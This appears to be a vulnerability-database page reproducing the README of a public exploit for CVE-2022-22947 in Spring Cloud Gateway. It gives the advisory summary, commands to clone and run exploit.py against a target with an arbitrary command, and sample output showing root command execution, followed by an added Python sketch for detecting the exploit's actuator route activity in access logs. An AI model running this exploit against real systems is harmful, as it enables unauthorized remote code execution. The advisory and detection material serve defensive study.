Related Vulnerability
Description
Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)
Introduction
# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)
###### CVE: CVE-2022-22947
###### CVSS: 10.0 (VMware - https://tanzu.vmware.com/security/cve-2022-22947)
###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
#### Usage
```sh
git clone https://github.com/carlosevieira/CVE-2022-22947
cd CVE-2022-22947
pip3 install -r requirements.txt
python3 exploit.py http://target 'id'
```
```sh
john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id'
###################################################
# #
# Exploit for CVE-2022-22947 #
# - Carlos Vieira (Crowsec) #
# #
# Usage: #
# python3 exploit.py <url> <command> #
# #
# Example: #
# python3 exploit.py http://localhost:8080 'id' #
# #
###################################################
[+] Stage deployed to /actuator/gateway/routes/rtxhovup
[+] Executing command...
[+] getting result...
[+] Stage removed!
uid=0(root) gid=0(root) groups=0(root)
```
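The run above leaves a recognizable trail in gateway access logs: a route is created under `/actuator/gateway/routes/`, read back, and removed by the same client. The following detection sketch is an added example, not part of the original repository. It assumes combined-format access logs, the default `/actuator` base path, and the Spring Cloud Gateway actuator's route create (POST), refresh and delete (DELETE) endpoints; the log lines and status codes are constructed.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines; only the route id comes from the output above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2022:10:00:01 +0000] "POST /actuator/gateway/routes/rtxhovup HTTP/1.1" 201 0
10.0.0.5 - - [01/Mar/2022:10:00:01 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
10.0.0.5 - - [01/Mar/2022:10:00:02 +0000] "GET /actuator/gateway/routes/rtxhovup HTTP/1.1" 200 412
10.0.0.5 - - [01/Mar/2022:10:00:02 +0000] "DELETE /actuator/gateway/routes/rtxhovup HTTP/1.1" 200 0
10.0.0.9 - - [01/Mar/2022:10:05:00 +0000] "GET /actuator/gateway/routes HTTP/1.1" 200 2048
10.0.0.7 - - [01/Mar/2022:10:06:00 +0000] "POST /actuator/gateway/routes/orders-v2 HTTP/1.1" 201 0
10.0.0.9 - - [01/Mar/2022:10:07:00 +0000] "GET /api/orders/17 HTTP/1.1" 200 96
"""

# Assumption: the actuator is served under the default /actuator base path.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
ROUTE_RE = re.compile(r'^/actuator/gateway/routes/(?P<id>[^/?]+)')
REFRESH = "/actuator/gateway/refresh"

def find_route_lifecycles(log_text):
    """Return findings for actuator route writes, grouped by (client, route id)."""
    methods = defaultdict(list)   # (ip, route_id) -> successful methods, in log order
    refreshed = set()             # clients that called the refresh endpoint
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["status"].startswith("2"):
            continue              # skip unparsable lines and failed requests
        path = m["path"].split("?", 1)[0]
        if path == REFRESH and m["method"] == "POST":
            refreshed.add(m["ip"])
            continue
        r = ROUTE_RE.match(path)
        if r:
            methods[(m["ip"], r["id"])].append(m["method"])
    findings = []
    for (ip, route_id), seen in methods.items():
        if "POST" not in seen:
            continue              # reads alone are not a route write
        # A route created and then deleted by the same client is the pattern above.
        short_lived = "DELETE" in seen[seen.index("POST"):]
        findings.append({"client": ip, "route_id": route_id, "methods": seen,
                         "refreshed": ip in refreshed,
                         "severity": "high" if short_lived else "review"})
    return findings

if __name__ == "__main__":
    for finding in find_route_lifecycles(SAMPLE_LOG):
        print(finding)
```

Any successful route write through the actuator from a client that is not a known deployment system deserves review, since the advisory's precondition is that this endpoint is enabled, exposed and unsecured.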
#### References
https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
https://tanzu.vmware.com/security/cve-2022-22947
File Snapshot
[4.0K] /data/pocs/5750bede1aa915efbee87c7bdeeea760a679f5fc
├── [3.1K] exploit.py
├── [1.8K] README.md
└── [ 89] requirements.txt
0 directories, 3 files